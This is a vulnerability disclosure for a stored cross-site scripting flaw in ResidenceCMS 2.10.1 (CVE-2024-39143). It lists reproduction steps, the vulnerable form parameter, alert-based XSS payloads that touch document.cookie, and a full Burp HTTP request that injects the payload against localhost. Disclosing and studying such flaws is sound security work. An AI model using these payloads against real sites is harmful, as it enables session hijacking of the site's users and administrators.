ResidenceCMS 2.10.1 Cross Site Scripting

`# Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting via Content Form  
# Date: 8-7-2024  
# Category: Web Application  
# Exploit Author: Jeremia Geraldi Sihombing  
# Version: 2.10.1  
# Tested on: Windows  
# CVE: CVE-2024-39143  
  
  
Description:  
----------------  
  
A stored cross-site scripting (XSS) vulnerability exists in   
ResidenceCMS 2.10.1 that allows a low-privilege user to create   
malicious property content with HTML inside it, which acts as a   
stored XSS payload. If this property page is visited by anyone   
including the administrator, then the XSS payload will be triggered..  
  
  
  
Steps to reproduce  
-------------------------  
  
1. Login as a low privilege user with property edit capability.  
  
2. Create or Edit one of the user owned property   
(We can user the default property owned by the user).  
  
3. Fill the content form with XSS payload using the Code View feature.   
Before saving it make sure to go back using the usual view to see if the HTML   
is rendered or not.  
  
Vulnerable parameter name: property[property_description][content]  
  
Example Payload: <img src="x" onerror="alert(document.cookie)">  
  
4. After saving the new property content and clicking the 'Finish Editing',   
go to the page and see the XSS is triggered.   
It is possible to trigger the XSS by using any account or even unauthorized account.  
  
  
Burp Request  
-------------------  
  
POST /en/user/property/7/edit HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 1111  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/en/user/property/7/edit  
Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Priority: u=1  
  
property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg  
`